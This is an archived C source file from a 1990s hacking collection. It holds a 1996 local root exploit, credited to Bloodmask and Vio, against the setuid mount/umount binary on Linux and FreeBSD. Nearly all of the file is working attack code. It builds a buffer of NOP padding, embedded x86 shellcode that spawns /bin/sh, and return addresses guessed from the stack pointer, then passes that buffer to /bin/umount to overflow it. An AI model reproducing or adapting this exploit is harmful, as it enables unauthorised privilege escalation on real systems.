home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / mount-ex.c < prev    next >
C/C++ Source or Header  |  1998-07-17  |  2KB  |  77 lines
  1. /* Mount Exploit for Linux/FreeBSD, Jul 30 1996 
  2.  
  3. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4. ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
  5. :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
  6. ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
  7. ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  8. ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  9. ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  10. ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  11. ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
  12. :::::::...........:::...........:::...........::.......:......:.......::::::
  13. :::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
  14.  
  15. Discovered and Coded by Bloodmask & Vio
  16. Covin 1996
  17. */
  18.  
  19. #include <unistd.h>
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <fcntl.h>
  23. #include <sys/stat.h>
  24.  
  25. #define PATH_MOUNT "/bin/umount"
  26. #define BUFFER_SIZE 1024
  27. #define DEFAULT_OFFSET 50
  28.  
  29. u_long get_esp() 
  31.   __asm__("movl %esp, %eax"); 
  32.  
  33. }
  34.  
  35. main(int argc, char **argv)
  36. {
  37.   u_char execshell[] = 
  38.    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  39.    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  40.    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  41.  
  42.    char *buff = NULL;
  43.    unsigned long *addr_ptr = NULL;
  44.    char *ptr = NULL;
  45.    
  46.    int i;
  47.    int ofs = DEFAULT_OFFSET;
  48.    
  49.    buff = malloc(4096);
  50.    if(!buff)
  51.    {
  52.       printf("can't allocate memory\n");
  53.       exit(0);
  54.    }
  55.    ptr = buff;
  56.  
  57.    /* fill start of buffer with nops */
  58.  
  59.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  60.    ptr += BUFFER_SIZE-strlen(execshell);
  61.  
  62.    /* stick asm code into the buffer */
  63.  
  64.    for(i=0;i < strlen(execshell);i++)
  65.       *(ptr++) = execshell[i];
  66.  
  67.    addr_ptr = (long *)ptr;
  68.    for(i=0;i < (8/4);i++)
  69.       *(addr_ptr++) = get_esp() + ofs;
  70.    ptr = (char *)addr_ptr;
  71.    *ptr = 0;
  72.  
  73.    (void)alarm((u_int)0);
  74.    printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
  75.    execl(PATH_MOUNT, "mount", buff, NULL);
  76. }
  77.